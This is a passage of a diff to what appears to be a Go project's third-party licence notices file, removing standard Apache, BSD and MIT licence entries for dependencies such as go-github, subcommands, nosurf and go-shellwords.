by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - Copyright 2019 ghinstallation AUTHORS - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - -------------------------------------------------------------------------------- Dependency : github.com/cavaliercoder/badio Version: v0.0.0-20160213150051-ce5280129e9e @@ -29589,117 +29357,6 @@ Contents of probable licence file $GOMODCACHE/github.com/google/btree@v1.0.0/LIC limitations under the License. --------------------------------------------------------------------------------- -Dependency : github.com/google/go-github/v28 -Version: v28.1.1 -Licence type (autodetected): BSD-3-Clause --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/google/go-github/v28@v28.1.1/LICENSE: - -Copyright (c) 2013 The go-github AUTHORS. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - --------------------------------------------------------------------------------- -Dependency : github.com/google/go-github/v29 -Version: v29.0.2 -Licence type (autodetected): BSD-3-Clause --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/google/go-github/v29@v29.0.2/LICENSE: - -Copyright (c) 2013 The go-github AUTHORS. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - --------------------------------------------------------------------------------- -Dependency : github.com/google/go-querystring -Version: v1.0.0 -Licence type (autodetected): BSD-3-Clause --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/google/go-querystring@v1.0.0/LICENSE: - -Copyright (c) 2013 Google. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - - -------------------------------------------------------------------------------- Dependency : github.com/google/gofuzz Version: v1.1.0 @@ -30972,218 +30629,6 @@ Contents of probable licence file $GOMODCACHE/github.com/google/shlex@v0.0.0-201 limitations under the License. --------------------------------------------------------------------------------- -Dependency : github.com/google/subcommands -Version: v1.0.1 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/google/subcommands@v1.0.1/LICENSE: - - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - -------------------------------------------------------------------------------- Dependency : github.com/googleapis/gax-go/v2 Version: v2.0.5 @@ -34416,111 +33861,6 @@ Exhibit B - “Incompatible With Secondary Licenses” Notice --------------------------------------------------------------------------------- -Dependency : github.com/haya14busa/go-actions-toolkit -Version: v0.0.0-20200105081403-ca0307860f01 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/haya14busa/go-actions-toolkit@v0.0.0-20200105081403-ca0307860f01/LICENSE: - -MIT License - -Copyright (c) 2020 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - ---- - -https://github.com/actions/toolkit - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - - --------------------------------------------------------------------------------- -Dependency : github.com/haya14busa/go-checkstyle -Version: v0.0.0-20170303121022-5e9d09f51fa1 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/haya14busa/go-checkstyle@v0.0.0-20170303121022-5e9d09f51fa1/LICENSE: - -MIT License - -Copyright (c) 2016 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - --------------------------------------------------------------------------------- -Dependency : github.com/haya14busa/secretbox -Version: v0.0.0-20180525171038-07c7ecf409f5 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/haya14busa/secretbox@v0.0.0-20180525171038-07c7ecf409f5/LICENSE: - -MIT License - -Copyright (c) 2018 haya14busa - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : github.com/hpcloud/tail Version: v1.0.0 @@ -34932,36 +34272,6 @@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. --------------------------------------------------------------------------------- -Dependency : github.com/justinas/nosurf -Version: v1.1.0 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/justinas/nosurf@v1.1.0/LICENSE: - -The MIT License (MIT) - -Copyright (c) 2013 Justinas Stankevicius - -Permission is hereby granted, free of charge, to any person obtaining a copy of -this software and associated documentation files (the "Software"), to deal in -the Software without restriction, including without limitation the rights to -use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of -the Software, and to permit persons to whom the Software is furnished to do so, -subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS -FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR -COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER -IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN -CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : github.com/karrick/godirwalk Version: v1.15.6 @@ -35241,218 +34551,6 @@ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. --------------------------------------------------------------------------------- -Dependency : github.com/kylelemons/godebug -Version: v1.1.0 -Licence type (autodetected): Apache-2.0 --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/kylelemons/godebug@v1.1.0/LICENSE: - - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - - -------------------------------------------------------------------------------- Dependency : github.com/magiconair/properties Version: v1.8.0 @@ -35618,37 +34716,6 @@ The above copyright notice and this permission notice shall be included in all c THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. --------------------------------------------------------------------------------- -Dependency : github.com/mattn/go-shellwords -Version: v1.0.7 -Licence type (autodetected): MIT --------------------------------------------------------------------------------- - -Contents of probable licence file $GOMODCACHE/github.com/mattn/go-shellwords@v1.0.7/LICENSE: - -The MIT License (MIT) - -Copyright (c) 2017 Yasuhiro Matsumoto - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -------------------------------------------------------------------------------- Dependency : 